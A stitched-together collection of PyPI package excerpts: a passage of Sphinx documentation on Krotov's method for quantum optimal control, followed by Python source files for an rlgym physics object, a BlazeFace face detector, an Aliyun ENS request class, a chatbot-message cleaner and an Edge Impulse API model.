improvement of :math:`J_T` is to be expected.
Eq. :eq:`krotov_first_order_update`
re-emerges as the continuous limit of the time-discretized update
equation \ :eq:`update_discretized`, i.e.,
:math:`\dd t \rightarrow 0` so that :math:`\tilde{t}_n \rightarrow t_n`.
Note that Eq. :eq:`update_discretized`
resolves the seeming contradiction in the time-continuous
Eq. :eq:`krotov_first_order_update`
that the calculation of :math:`\epsilon^{(i)}(t)` requires knowledge of
the states :math:`\ket{\phi_k^{(i)}(t)}` which would have to be obtained
from a propagation under :math:`\epsilon^{(i)}(t)`. By having the time
argument :math:`\tilde{t}_n` on the left-hand-side of
Eq. :eq:`update_discretized`, and
:math:`t_n < \tilde{t}_n` on the right-hand-side (with
:math:`S(\tilde{t}_n)` known at all times), the update for each interval
only depends on "past" information.
For multiple objectives, the scheme can run in parallel, and each objective
contributes a term to the update. Summation of these terms yields the sum
in Eq. :eq:`krotov_first_order_update`. See :mod:`krotov.parallelization` for
details. For a second-order update, the forward propagated states from step 4,
both for the current iteration and the previous iteration, must be stored in
memory over the entire time grid.
.. _Time Discretization in Quantum Optimal Control: https://nbviewer.jupyter.org/gist/goerz/21e46ea7b45c9514e460007de14419bd/Krotov_time_discretization.ipynb#
Pseudocode
----------
A complete pseudocode for Krotov's method as described in the previous section
:ref:`TimeDiscretization` is available in PDF format: `krotov_pseudocode.pdf`_.
.. _krotov_pseudocode.pdf: krotov_pseudocode.pdf
.. _ChoiceOfLambdaA:
Choice of λₐ
------------
The monotonic convergence of Krotov's method is only guaranteed in the
continuous limit; a coarse
time step must be compensated by larger values of the inverse step size
:math:`\lambda_{a,l}`, slowing down convergence. Values that are too
small will cause sharp spikes in the optimized control and numerical
instabilities. A lower limit for :math:`\lambda_{a,l}` can be determined
from the requirement that the change :math:`\Delta\epsilon_l^{(i)}(t)`
should be at most of the same order of magnitude as the guess pulse
:math:`\epsilon_l^{(i-1)}(t)` for that iteration. The Cauchy-Schwarz
inequality applied to the update
equation \ :eq:`krotov_first_order_update`
yields
.. math::
\Norm{\Delta \epsilon_l(t)}_{\infty}
\le
\frac{\Norm{S(t)}}{\lambda_{a,l}}
\sum_{k} \Norm{\ket{\chi_k (t)}}_{\infty} \Norm{\ket{\phi_k (t)}}_{\infty}
\Norm{\frac{\partial \Op{H}}{\partial \epsilon_l(t)}}_{\infty}
\stackrel{!}{\le}
\Norm{\epsilon_l^{(i)}(t)}_{\infty}\,,
where :math:`\norm{\partial \Op{H}/\partial \epsilon_l(t)}_{\infty}` denotes the
supremum norm of the operator :math:`\partial \Op{H}/\partial \epsilon_l`
obtained at time :math:`t`. Since :math:`S(t) \in [0,1]` and
:math:`\ket{\phi_k}` are normalized, the condition for :math:`\lambda_{a,l}` becomes
.. math::
\lambda_{a,l} \ge
\frac{1}{\Norm{\epsilon_l^{(i)}(t)}_{\infty}}
\left[ \sum_{k} \Norm{\ket{\chi_k(t)}}_{\infty} \right]
\Norm{\frac{\partial \Op{H}}{\partial \epsilon_l(t)}}_{\infty}\,.
From a practical point of view, the best strategy is to start the
optimization with a comparatively large value of :math:`\lambda_{a,l}`,
and after a few iterations lower :math:`\lambda_{a,l}` as far as
possible without introducing numerical instabilities. In principle, the value
of :math:`\lambda_{a,l}` may be adjusted dynamically with respect to the
rate of convergence, via the `modify_params_after_iter` argument to
:func:`.optimize_pulses`. Generally, the ideal choice of
:math:`\lambda_{a,l}` requires some trial and error, but once a suitable value
has been found, it does not have to be adjusted further. In particular, it is
not necessary to perform a line search over :math:`\lambda_{a,l}`.
Complex controls and the RWA
----------------------------
When using the rotating wave approximation (RWA), it is important to remember
that the target states are usually defined in the lab frame, not in the
rotating frame. This is relevant for the construction of
:math:`\ket{\chi_k(T)}`. When doing a simple optimization, such as a
state-to-state or a gate optimization, the easiest approach is to transform
the target states to the rotating frame before calculating
:math:`\ket{\chi_k(T)}`. This is both straightforward and numerically
efficient.
Another solution would be to transform the result of the forward propagation
:math:`\ket{\phi_k(T)}` from the rotating frame to the lab frame, then
constructing :math:`\ket{\chi_k(T)}`, and finally to transform
:math:`\ket{\chi_k(T)}` back to the rotating frame, before starting the
backward propagation.
When the RWA is used, the control fields are
complex-valued. In this case the Krotov update equation is valid for
both the real and the imaginary part independently. The most straightforward
implementation of the method is for real controls only, requiring that any
complex control Hamiltonian is rewritten as two independent control
Hamiltonians, one for the real part and one for the imaginary part of the
control field. For example,
.. math::
\epsilon^*(t) \Op{a} + \epsilon(t) \Op{a}^\dagger
= \epsilon_{\text{re}}(t) (\Op{a} + \Op{a}^\dagger) + \epsilon_{\text{im}}(t) (i \Op{a}^\dagger - i \Op{a})
with two independent control fields :math:`\epsilon_{\text{re}}(t)= \Re[\epsilon(t)]` and
:math:`\epsilon_{\text{im}}(t) = \Im[\epsilon(t)]`.
See the :ref:`/notebooks/02_example_lambda_system_rwa_complex_pulse.ipynb` for an
example.
Optimization in Liouville space
-------------------------------
The coupled equations :eq:`krotov_first_order_update`–:eq:`bw_eqm` can be
generalized to open system dynamics by replacing Hilbert space states with
density matrices, :math:`\Op{H}` with :math:`\mathrm{i} \Liouville`, and brakets (inner products) with Hilbert-Schmidt products,
:math:`\langle \cdot \vert \cdot \rangle \rightarrow \langle\!\langle \cdot
\vert \cdot \rangle\!\rangle`. In full generality, :math:`\Op{H}` in
Eq. :eq:`krotov_first_order_update` is the operator :math:`H` on the right-hand
side of whatever the equation of motion for the forward propagation of the
states is, written in the form :math:`\mathrm{i} \hbar \dot\phi = H \phi`,
cf. Eq. :eq:`fw_eqm`. See :mod:`krotov.mu` for details.
Note also that the backward propagation Eq. :eq:`bw_eqm`
uses the adjoint :math:`H`, which is relevant both for a dissipative
Liouvillian :cite:`BartanaJCP93,OhtsukiJCP99,GoerzNJP2014` and a non-Hermitian
Hamiltonian :cite:`MullerQIP11,GoerzQST2018`.
See the :ref:`/notebooks/04_example_dissipative_qubit_reset.ipynb` for an example.
|
PypiClean
|
/EARL-pytorch-0.5.1.tar.gz/EARL-pytorch-0.5.1/rlgym/utils/gamestates/physics_object.py
|
from rlgym.utils import math
import numpy as np
from typing import Optional
class PhysicsObject(object):
    """Physics state of an in-game object (a car or the ball).

    Holds position, orientation (as a quaternion) and linear/angular
    velocities. Euler angles and the rotation matrix are derived from the
    quaternion on first access and cached thereafter.
    """

    def __init__(self, position=None, quaternion=None, linear_velocity=None, angular_velocity=None):
        self.position: np.ndarray = position if position is not None else np.zeros(3)
        # ones by default to prevent mathematical errors when converting quat to rot matrix on empty physics state
        self.quaternion: np.ndarray = quaternion if quaternion is not None else np.ones(4)
        self.linear_velocity: np.ndarray = linear_velocity if linear_velocity is not None else np.zeros(3)
        self.angular_velocity: np.ndarray = angular_velocity if angular_velocity is not None else np.zeros(3)
        # Lazily-computed caches for the derived orientation representations;
        # the flags record whether the caches reflect the current quaternion.
        self._euler_angles: Optional[np.ndarray] = np.zeros(3)
        self._rotation_mtx: Optional[np.ndarray] = np.zeros((3, 3))
        self._has_computed_rot_mtx = False
        self._has_computed_euler_angles = False

    def decode_car_data(self, car_data: np.ndarray):
        """
        Function to decode the physics state of a car from the game state array.

        :param car_data: Slice of game state array containing the car data to decode.
        """
        self.position = car_data[:3]
        self.quaternion = car_data[3:7]
        self.linear_velocity = car_data[7:10]
        self.angular_velocity = car_data[10:]
        # BUG FIX: the quaternion changed, so previously cached euler angles /
        # rotation matrix would be stale; force them to be recomputed.
        self._has_computed_rot_mtx = False
        self._has_computed_euler_angles = False

    def decode_ball_data(self, ball_data: np.ndarray):
        """
        Function to decode the physics state of the ball from the game state array.

        :param ball_data: Slice of game state array containing the ball data to decode.
        """
        # Note: the ball's quaternion is not part of the ball data, so the
        # orientation caches remain valid and are left untouched.
        self.position = ball_data[:3]
        self.linear_velocity = ball_data[3:6]
        self.angular_velocity = ball_data[6:9]

    def forward(self) -> np.ndarray:
        """Unit vector pointing forward (first column of the rotation matrix)."""
        return self.rotation_mtx()[:, 0]

    def right(self) -> np.ndarray:
        """Unit vector pointing right (second column of the rotation matrix)."""
        return self.rotation_mtx()[:, 1]

    def left(self) -> np.ndarray:
        """Unit vector pointing left (negated right vector)."""
        return self.rotation_mtx()[:, 1] * -1

    def up(self) -> np.ndarray:
        """Unit vector pointing up (third column of the rotation matrix)."""
        return self.rotation_mtx()[:, 2]

    def pitch(self) -> float:
        """Pitch angle derived from the quaternion."""
        return self.euler_angles()[0]

    def yaw(self) -> float:
        """Yaw angle derived from the quaternion."""
        return self.euler_angles()[1]

    def roll(self) -> float:
        """Roll angle derived from the quaternion."""
        return self.euler_angles()[2]

    # pitch, yaw, roll
    def euler_angles(self) -> np.ndarray:
        """Return the (pitch, yaw, roll) array for the current quaternion,
        computing and caching it on first access."""
        if not self._has_computed_euler_angles:
            self._euler_angles = math.quat_to_euler(self.quaternion)
            self._has_computed_euler_angles = True
        return self._euler_angles

    def rotation_mtx(self) -> np.ndarray:
        """Return the 3x3 rotation matrix for the current quaternion,
        computing and caching it on first access."""
        if not self._has_computed_rot_mtx:
            self._rotation_mtx = math.quat_to_rot_mtx(self.quaternion)
            self._has_computed_rot_mtx = True
        return self._rotation_mtx

    def serialize(self):
        """
        Function to serialize all the values contained by this physics object into a single 1D list. This can be useful
        when constructing observations for a policy.

        :return: List containing the serialized data.
        """
        # Renamed the accumulator from ``repr`` (which shadowed the builtin)
        # and replaced the per-element append loops with ``list.extend``;
        # element order and values are unchanged.
        data = []
        if self.position is not None:
            data.extend(self.position)
        if self.quaternion is not None:
            data.extend(self.quaternion)
        if self.linear_velocity is not None:
            data.extend(self.linear_velocity)
        if self.angular_velocity is not None:
            data.extend(self.angular_velocity)
        if self._euler_angles is not None:
            data.extend(self._euler_angles)
        if self._rotation_mtx is not None:
            data.extend(self._rotation_mtx.ravel())
        return data
|
PypiClean
|
/nsface_python-1.1.78-py3-none-any.whl/nsface/model_zoo/model_detection/blazeface.py
|
import os
import numpy as np
import skimage.transform
import os
import os.path as osp
import cv2
import time
import torch
from ...utils.util_detection import tensors_to_detections_np,weighted_non_max_suppression_np
from ..model_common import load_tensorRT, load_onnx, load_openvino,load_torch, load_tensorRT_multiple
from ...data.image import read_torchImage,resize_image_multi,resize_image
class BlazeFace:
    """BlazeFace face detector wrapper supporting multiple inference backends.

    Backends: torch ('pt'/'pth'), ONNX ('onnx'), TensorRT ('trt') and
    OpenVINO ('openvino').  ``isfront`` selects the 128x128 front-camera
    variant; otherwise the 256x256 back-camera variant is used.  SSD anchor
    boxes are loaded from a ``.npy`` file located next to the model file.
    """
    def __init__(self, model_type, model_path, isfront=False, **kwargs):
        """
        :param model_type: backend id: 'pt'/'pth', 'onnx', 'trt', 'vino'/'openvino'.
        :param model_path: model file path (OpenVINO passes a list of paths).
        :param isfront: True for the front-camera (128 px) model.
        :param kwargs: optional 'nms_thresh' (preferred) / 'iou_thresh' NMS IoU
            threshold, 'anchors_name', 'onnx_device', 'device'.
        """
        self.model_path = model_path
        self.model_type = model_type
        self.isfront = isfront
        # BUGFIX: previously this attribute was first assigned from 'iou_thresh'
        # and then unconditionally re-assigned from 'nms_thresh' with its
        # default, so a caller-supplied 'iou_thresh' was silently ignored.
        # 'nms_thresh' still wins when both are given; 'iou_thresh' now works
        # as a backward-compatible fallback alias.
        self.min_suppression_threshold = kwargs.get(
            "nms_thresh", kwargs.get("iou_thresh", 0.3)
        )
        # OpenVINO models come as a list of files; use the first to locate the directory.
        if model_type in ['vino', 'openvino']:
            self.model_base = os.path.join("/", *model_path[0].split("/")[:-1])
            self.model_name = model_path[0].split("/")[-1]
        else:
            self.model_base = os.path.join("/", *model_path.split("/")[:-1])
            self.model_name = model_path.split("/")[-1]
        # The anchor file is expected to sit next to the model file.
        if self.isfront:
            self.anchors_name = kwargs.get("anchors_name", "blazeface_front_anchors.npy")
        else:
            self.anchors_name = kwargs.get("anchors_name", "blazeface_back_anchors.npy")
        self.anchors_path = os.path.join(self.model_base, self.anchors_name)
        if self.model_type in ['pt', 'pth']:
            if self.isfront:
                self.net = load_torch.TorchModel('blazeface_front', self.model_path)
            else:
                self.net = load_torch.TorchModel('blazeface_back', self.model_path)
        elif self.model_type == 'onnx':
            self.net = load_onnx.Onnx_session(self.model_path, input_mean=0.0, input_std=1.0,
                                              output_sort=True,
                                              onnx_device=kwargs.get("onnx_device", 'cuda'))
        elif self.model_type == 'trt':
            self.net = load_tensorRT.TrtModel(self.model_path, torch_image=True, not_norm=True)
        elif self.model_type == 'openvino':
            self.net = load_openvino.Openvino(self.model_path, not_norm=True, torch_image=True,
                                              device=kwargs.get("device", 'CPU'))
        self._init_vars()
    def _init_vars(self):
        """Set SSD decoding constants and load the anchor boxes."""
        self.num_anchors = 896
        self.num_coords = 16
        self.num_classes = 1
        self.score_clipping_thresh = 100.0
        # Input resolution used to de-normalise the predicted box coordinates.
        if self.isfront:
            #self.min_score_thresh = 0.75
            self.x_scale = 128.0
            self.y_scale = 128.0
            self.h_scale = 128.0
            self.w_scale = 128.0
        else:
            #self.min_score_thresh = 0.65
            self.x_scale = 256.0
            self.y_scale = 256.0
            self.h_scale = 256.0
            self.w_scale = 256.0
        self.anchors = np.array(np.load(self.anchors_path), dtype=np.float32)
    def forward(self, img, thresh, input_size):
        """Run the network and decode raw outputs into per-image detections.

        :param img: preprocessed input tensor/array (see detect()).
        :param thresh: minimum detection score.
        :param input_size: unused here; kept for call symmetry with detect().
        :return: (filtered_detections, net_out_time_ms) where each element of
            filtered_detections is an (N, 17) array of faces for one image.
        """
        net_out_start = time.time()
        outs = self.net(img)
        net_out_end = time.time()
        if self.model_type == 'trt':
            # TensorRT returns flat buffers; restore (batch, anchors, channels).
            for oi, o in enumerate(outs):
                if oi == 0:
                    outs[oi] = np.reshape(outs[oi].ravel(), (-1, self.num_anchors, self.num_classes))
                else:
                    outs[oi] = np.reshape(outs[oi].ravel(), (-1, self.num_anchors, self.num_coords))
        # Decode SSD offsets against the anchors, then weighted NMS per image.
        detections = tensors_to_detections_np(outs[1], outs[0], self.anchors, self.num_anchors,
                                              self.num_coords, self.num_classes,
                                              self.score_clipping_thresh, thresh,
                                              self.x_scale, self.y_scale, self.w_scale, self.h_scale)
        filtered_detections = []
        for i in range(len(detections)):
            faces = weighted_non_max_suppression_np(detections[i], self.min_suppression_threshold)
            faces = np.stack(faces) if len(faces) > 0 else np.zeros((0, 17))
            filtered_detections.append(faces)
        net_out_time = (net_out_end - net_out_start) * 1000
        return filtered_detections, net_out_time
    def detect(self, img, thresh=0.65, input_size=None, resize_method='pad'):
        """Detect faces in an (H, W, 3) image.

        :param img: input image array.
        :param thresh: minimum detection score.
        :param input_size: [width, height]; defaults to the model's native size.
        :param resize_method: 'pad' letterboxes the image into the model input;
            'resize' stretches it.  NOTE(review): any other value reaches the
            final return with pos_x/pos_y/det_scale undefined (NameError) --
            confirm callers only pass these two values.
        :return: for 'resize': (bboxes, keypoints, scores, scale_x, scale_y,
            input_size, time_dict); otherwise: (bboxes, keypoints, scores,
            det_img, [pos_x, pos_y], det_scale, input_size, time_dict).
        """
        if not input_size:
            if self.isfront:
                input_size = [128, 128]
            else:
                input_size = [256, 256]
        if resize_method == 'pad':
            rescale_start = time.time()
            det_scale = 1.0
            det_img = np.zeros((input_size[1], input_size[0], 3), dtype=np.uint8)
            pos_y = 0
            pos_x = 0
            if img.shape[0] < input_size[0] and img.shape[1] < input_size[1]:
                # Small image: paste centered without scaling.
                pos_y = (input_size[0] - img.shape[0]) // 2
                pos_x = (input_size[1] - img.shape[1]) // 2
                det_img[pos_y:pos_y + img.shape[0], pos_x:pos_x + img.shape[1], :] = img
            elif img.shape[0] == img.shape[1] and img.shape[0] > input_size[0]:
                # Large square image: shrink to 3/4 of the input size and center.
                resize = input_size[0] // 4 * 3
                det_scale = float(resize) / img.shape[0]
                img = cv2.resize(img, (resize, resize))
                pos_y = (input_size[0] - img.shape[0]) // 2
                pos_x = (input_size[1] - img.shape[1]) // 2
                det_img[pos_y:pos_y + img.shape[0], pos_x:pos_x + img.shape[1], :] = img
            else:
                # General case: fit inside the input while keeping aspect ratio.
                im_ratio = float(img.shape[0]) / img.shape[1]
                model_ratio = float(input_size[1]) / input_size[0]
                if im_ratio > model_ratio:
                    new_height = input_size[1]
                    pos_y = 0
                    new_width = int(new_height / im_ratio)
                    pos_x = (input_size[0] - new_width) // 2
                else:
                    new_width = input_size[0]
                    pos_x = 0
                    new_height = int(new_width * im_ratio)
                    pos_y = (input_size[1] - new_height) // 2
                det_scale = float(new_height) / img.shape[0]
                resized_img = cv2.resize(img, (new_width, new_height))
                det_img[pos_y:pos_y + new_height, pos_x:pos_x + new_width, :] = resized_img
        else:
            rescale_start = time.time()
            det_img = resize_image(img, (input_size[1], input_size[0]))
            meta = {'original_shape': img.shape, 'resized_shape': det_img.shape}
            scale_x = meta['resized_shape'][1] / meta['original_shape'][1]
            scale_y = meta['resized_shape'][0] / meta['original_shape'][0]
        self.det_shape = det_img.shape
        self.det_img = det_img
        # Normalise pixel values to [-1, 1].
        det_img = np.float32(det_img)
        det_img = (det_img / 127.5) - 1.0
        rescale_end = time.time()
        if not self.model_type == 'onnx':
            # Non-ONNX backends expect an NCHW torch tensor.
            det_img = det_img.transpose(2, 0, 1)
            det_img = torch.from_numpy(det_img).unsqueeze(0)
        forward_start = time.time()
        outs = self.forward(det_img, thresh, input_size)
        forward_end = time.time()
        if not outs:
            return None
        filtered_detections, net_out_time = outs
        post1_start = time.time()
        bboxs = []
        keypoints = []
        scores = []
        for final in filtered_detections:
            for d in final:
                # Reorder box coords (stored y-first -- presumably the
                # MediaPipe convention; confirm) to (x1, y1, x2, y2).
                bbox = np.array([d[1], d[0], d[3], d[2]])
                bboxs.append(bbox)
                scores.append(d[16])
                eye_right = [d[4], d[5]]
                eye_left = [d[6], d[7]]
                nose = [d[8], d[9]]
                mouth = [d[10], d[11]]
                ear_right = [d[12], d[13]]
                ear_left = [d[14], d[15]]
                keypoints.append([eye_right, eye_left, nose, mouth, ear_right, ear_left])
        post1_end = time.time()
        rescale_time = (rescale_end - rescale_start) * 1000
        forward_time = (forward_end - forward_start) * 1000
        post1_time = (post1_end - post1_start) * 1000
        time_dict = {'rescale': rescale_time, "forward": forward_time, 'post1': post1_time, 'net_out': net_out_time}
        if resize_method == 'resize':
            return np.array(bboxs), np.array(keypoints), np.array(scores), scale_x, scale_y, input_size, time_dict
        else:
            return np.array(bboxs), np.array(keypoints), np.array(scores), det_img, [pos_x, pos_y], det_scale, input_size, time_dict
|
PypiClean
|
/aliyun-python-sdk-ens-3.0.13.tar.gz/aliyun-python-sdk-ens-3.0.13/aliyunsdkens/request/v20171110/RunInstancesRequest.py
|
from aliyunsdkcore.request import RpcRequest
import json
class RunInstancesRequest(RpcRequest):
    """Auto-generated request object for the ENS ``RunInstances`` API (version 2017-11-10).

    Each supported query parameter has a getter/setter pair that reads from /
    writes to the request's query-parameter dict.  ``SystemDisk`` (a struct)
    and ``DataDisk`` (an array) are JSON-serialized before being added.
    """
    def __init__(self):
        RpcRequest.__init__(self, 'Ens', '2017-11-10', 'RunInstances','ens')
        self.set_method('POST')
    def get_ScheduleAreaLevel(self): # String
        return self.get_query_params().get('ScheduleAreaLevel')
    def set_ScheduleAreaLevel(self, ScheduleAreaLevel): # String
        self.add_query_param('ScheduleAreaLevel', ScheduleAreaLevel)
    def get_UniqueSuffix(self): # Boolean
        return self.get_query_params().get('UniqueSuffix')
    def set_UniqueSuffix(self, UniqueSuffix): # Boolean
        self.add_query_param('UniqueSuffix', UniqueSuffix)
    def get_InstanceChargeStrategy(self): # String
        return self.get_query_params().get('InstanceChargeStrategy')
    def set_InstanceChargeStrategy(self, InstanceChargeStrategy): # String
        self.add_query_param('InstanceChargeStrategy', InstanceChargeStrategy)
    def get_SecurityId(self): # String
        return self.get_query_params().get('SecurityId')
    def set_SecurityId(self, SecurityId): # String
        self.add_query_param('SecurityId', SecurityId)
    def get_KeyPairName(self): # String
        return self.get_query_params().get('KeyPairName')
    def set_KeyPairName(self, KeyPairName): # String
        self.add_query_param('KeyPairName', KeyPairName)
    def get_Password(self): # String
        return self.get_query_params().get('Password')
    def set_Password(self, Password): # String
        self.add_query_param('Password', Password)
    def get_HostName(self): # String
        return self.get_query_params().get('HostName')
    def set_HostName(self, HostName): # String
        self.add_query_param('HostName', HostName)
    def get_SystemDisk(self): # Struct
        return self.get_query_params().get('SystemDisk')
    def set_SystemDisk(self, SystemDisk): # Struct
        # Struct parameters are sent as a JSON string.
        self.add_query_param("SystemDisk", json.dumps(SystemDisk))
    def get_NetDistrictCode(self): # String
        return self.get_query_params().get('NetDistrictCode')
    def set_NetDistrictCode(self, NetDistrictCode): # String
        self.add_query_param('NetDistrictCode', NetDistrictCode)
    def get_EnsRegionId(self): # String
        return self.get_query_params().get('EnsRegionId')
    def set_EnsRegionId(self, EnsRegionId): # String
        self.add_query_param('EnsRegionId', EnsRegionId)
    def get_Period(self): # Long
        return self.get_query_params().get('Period')
    def set_Period(self, Period): # Long
        self.add_query_param('Period', Period)
    def get_PublicIpIdentification(self): # Boolean
        return self.get_query_params().get('PublicIpIdentification')
    def set_PublicIpIdentification(self, PublicIpIdentification): # Boolean
        self.add_query_param('PublicIpIdentification', PublicIpIdentification)
    def get_VSwitchId(self): # String
        return self.get_query_params().get('VSwitchId')
    def set_VSwitchId(self, VSwitchId): # String
        self.add_query_param('VSwitchId', VSwitchId)
    def get_PrivateIpAddress(self): # String
        return self.get_query_params().get('PrivateIpAddress')
    def set_PrivateIpAddress(self, PrivateIpAddress): # String
        self.add_query_param('PrivateIpAddress', PrivateIpAddress)
    def get_PeriodUnit(self): # String
        return self.get_query_params().get('PeriodUnit')
    def set_PeriodUnit(self, PeriodUnit): # String
        self.add_query_param('PeriodUnit', PeriodUnit)
    def get_InstanceName(self): # String
        return self.get_query_params().get('InstanceName')
    def set_InstanceName(self, InstanceName): # String
        self.add_query_param('InstanceName', InstanceName)
    def get_AutoRenew(self): # Boolean
        return self.get_query_params().get('AutoRenew')
    def set_AutoRenew(self, AutoRenew): # Boolean
        self.add_query_param('AutoRenew', AutoRenew)
    def get_InternetChargeType(self): # String
        return self.get_query_params().get('InternetChargeType')
    def set_InternetChargeType(self, InternetChargeType): # String
        self.add_query_param('InternetChargeType', InternetChargeType)
    def get_NetWorkId(self): # String
        return self.get_query_params().get('NetWorkId')
    def set_NetWorkId(self, NetWorkId): # String
        self.add_query_param('NetWorkId', NetWorkId)
    def get_SchedulingPriceStrategy(self): # String
        return self.get_query_params().get('SchedulingPriceStrategy')
    def set_SchedulingPriceStrategy(self, SchedulingPriceStrategy): # String
        self.add_query_param('SchedulingPriceStrategy', SchedulingPriceStrategy)
    def get_ImageId(self): # String
        return self.get_query_params().get('ImageId')
    def set_ImageId(self, ImageId): # String
        self.add_query_param('ImageId', ImageId)
    def get_InternetMaxBandwidthOut(self): # Long
        return self.get_query_params().get('InternetMaxBandwidthOut')
    def set_InternetMaxBandwidthOut(self, InternetMaxBandwidthOut): # Long
        self.add_query_param('InternetMaxBandwidthOut', InternetMaxBandwidthOut)
    def get_UserData(self): # String
        return self.get_query_params().get('UserData')
    def set_UserData(self, UserData): # String
        self.add_query_param('UserData', UserData)
    def get_PasswordInherit(self): # Boolean
        return self.get_query_params().get('PasswordInherit')
    def set_PasswordInherit(self, PasswordInherit): # Boolean
        self.add_query_param('PasswordInherit', PasswordInherit)
    def get_InstanceType(self): # String
        return self.get_query_params().get('InstanceType')
    def set_InstanceType(self, InstanceType): # String
        self.add_query_param('InstanceType', InstanceType)
    def get_InstanceChargeType(self): # String
        return self.get_query_params().get('InstanceChargeType')
    def set_InstanceChargeType(self, InstanceChargeType): # String
        self.add_query_param('InstanceChargeType', InstanceChargeType)
    def get_Amount(self): # Long
        return self.get_query_params().get('Amount')
    def set_Amount(self, Amount): # Long
        self.add_query_param('Amount', Amount)
    def get_DataDisk(self): # Array
        return self.get_query_params().get('DataDisk')
    def set_DataDisk(self, DataDisk): # Array
        # Array parameters are sent as a JSON string.
        self.add_query_param("DataDisk", json.dumps(DataDisk))
    def get_SchedulingStrategy(self): # String
        return self.get_query_params().get('SchedulingStrategy')
    def set_SchedulingStrategy(self, SchedulingStrategy): # String
        self.add_query_param('SchedulingStrategy', SchedulingStrategy)
    def get_Carrier(self): # String
        return self.get_query_params().get('Carrier')
    def set_Carrier(self, Carrier): # String
        self.add_query_param('Carrier', Carrier)
|
PypiClean
|
/take-icusecases-0.0.3.tar.gz/take-icusecases-0.0.3/takeusecases/ml/data_source/database.py
|
import json
import pandas as pd
# from ml.data_source.base import DataSource
from SentenceTokenizer import SentenceTokenizer
from takeusecases.ml.data_source.base import DataSource
class DataBase(DataSource):
    """DataSource implementation backed by a database.

    The connection-handling methods are currently stubs; ``clean_owner_caller``
    performs the actual extraction of plain-text messages from raw bot flow
    JSON into a flat per-bot table.
    """
    def __init__(self):
        """Constructor (no state is needed yet)."""
        pass
    def get_data(self) -> pd.DataFrame:
        """Return a flat table as a DataFrame (not yet implemented).

        :return: pd.DataFrame with the data, or None while unimplemented.
        """
        pass
    def open_connection(self, connection):
        """Open the connection to the database (not yet implemented).

        :param connection: connection string.
        :return: bool indicating whether the connection is open.
        """
        pass
    def close_connection(self, connection):
        """Close the database connection (not yet implemented).

        :param connection: connection string.
        :return: bool indicating whether the connection was closed.
        """
        pass
    def clean_owner_caller(self, df):
        """Flatten bot flow JSON into one tokenized message string per bot.

        :param df: DataFrame with columns 'Caller' (bot id), 'Json' (flow
            definition) and 'msgs' (message count).
        :return: DataFrame with columns 'BotId' and 'Message' (all of a bot's
            text/plain input/output contents joined with '. ').
        """
        df = df[df['msgs'].notnull()]
        df = df[df['msgs'] > 0]
        # Altered by Ramon due to new usage in production
        # df.columns = ['Caller', 'Json', 'msgs']
        assert 'Caller' in df.columns
        assert 'Json' in df.columns
        assert 'msgs' in df.columns
        messages = []
        for _, row in df.iterrows():
            # NaN cells arrive as floats; skip rows without a JSON payload.
            # (Was 'isinstance(...) == False' — same behavior, idiomatic form.)
            if not isinstance(row['Json'], float):
                info = json.loads(row['Json'])
                for i in info['states']:
                    if 'inputActions' in i:
                        for j in i['inputActions']:
                            if 'type' in j['settings'] and 'content' in j['settings']:
                                if j['settings']['type'] == 'text/plain':
                                    messages.append([row['Caller'], 'Input', j['settings']['content']])
                    if 'outputActions' in i:
                        for j in i['outputActions']:
                            if 'type' in j['settings'] and 'content' in j['settings']:
                                if j['settings']['type'] == 'text/plain':
                                    messages.append([row['Caller'], 'Output', j['settings']['content']])
        df_mes = pd.DataFrame(messages, columns=['BotId', 'Type', 'Message'])
        df_mes = df_mes[df_mes['Message'].notnull()]
        tokenizer = SentenceTokenizer()
        df_mes['Message'] = df_mes.Message.apply(lambda x: tokenizer.process_message(x))
        # Re-filter: the tokenizer may map a message to None.
        df_mes = df_mes[df_mes['Message'].notnull()]
        df_messages = df_mes[['BotId']].drop_duplicates()
        df_messages['Message'] = df_mes.groupby(['BotId'])['Message'].transform(lambda x: '. '.join(x))
        return df_messages
|
PypiClean
|
/edgeimpulse_api-1.29.20.tar.gz/edgeimpulse_api-1.29.20/edgeimpulse_api/models/tuner_create_trial_impulse.py
|
from __future__ import annotations
from inspect import getfullargspec
import pprint
import re # noqa: F401
import json
from typing import Any, Dict, List, Optional
from pydantic import BaseModel, Field, StrictStr
class TunerCreateTrialImpulse(BaseModel):
    """Pydantic model for a tuner trial impulse (auto-generated from OpenAPI).

    Block lists are kept as raw dicts; the camelCase aliases match the wire
    format used by the Edge Impulse API.
    """
    id: Optional[StrictStr] = None
    experiment: Optional[StrictStr] = None
    original_trial_id: Optional[StrictStr] = None
    input_blocks: Optional[List[Dict[str, Any]]] = Field(None, alias="inputBlocks")
    dsp_blocks: Optional[List[Dict[str, Any]]] = Field(None, alias="dspBlocks")
    learn_blocks: Optional[List[Dict[str, Any]]] = Field(None, alias="learnBlocks")
    # Ordered list of serializable properties (aliases for the block lists).
    __properties = ["id", "experiment", "original_trial_id", "inputBlocks", "dspBlocks", "learnBlocks"]
    class Config:
        allow_population_by_field_name = True
        validate_assignment = False
    def to_str(self) -> str:
        """Returns the string representation of the model using alias"""
        return pprint.pformat(self.dict(by_alias=True))
    def to_json(self) -> str:
        """Returns the JSON representation of the model using alias"""
        return json.dumps(self.to_dict())
    @classmethod
    def from_json(cls, json_str: str) -> TunerCreateTrialImpulse:
        """Create an instance of TunerCreateTrialImpulse from a JSON string"""
        return cls.from_dict(json.loads(json_str))
    def to_dict(self):
        """Returns the dictionary representation of the model using alias"""
        _dict = self.dict(by_alias=True,
                          exclude={
                          },
                          exclude_none=True)
        return _dict
    @classmethod
    def from_dict(cls, obj: dict) -> TunerCreateTrialImpulse:
        """Create an instance of TunerCreateTrialImpulse from a dict"""
        if obj is None:
            return None
        # NOTE(review): exact type check — dict subclasses (e.g. OrderedDict)
        # skip the alias mapping below and are passed to construct() raw;
        # confirm that is the intended generated behavior.
        if type(obj) is not dict:
            return TunerCreateTrialImpulse.construct(**obj)
        # Map wire-format (aliased) keys onto the python field names.
        _obj = TunerCreateTrialImpulse.construct(**{
            "id": obj.get("id"),
            "experiment": obj.get("experiment"),
            "original_trial_id": obj.get("original_trial_id"),
            "input_blocks": obj.get("inputBlocks"),
            "dsp_blocks": obj.get("dspBlocks"),
            "learn_blocks": obj.get("learnBlocks")
        })
        return _obj
|
PypiClean
|
/python-gtkmvc3-dlr-1.0.1.tar.gz/python-gtkmvc3-dlr-1.0.1/examples/adapters/user_class.py
|
import _importer
from gtkmvc3 import Model, Controller, View, Observable
from gtkmvc3.adapters import UserClassAdapter
import gtk
# This example makes use of a user-defined class that contains a
# setter and a getter for an internal variable. When the class is
# instantiated, a maximum value is specified. That limit represents
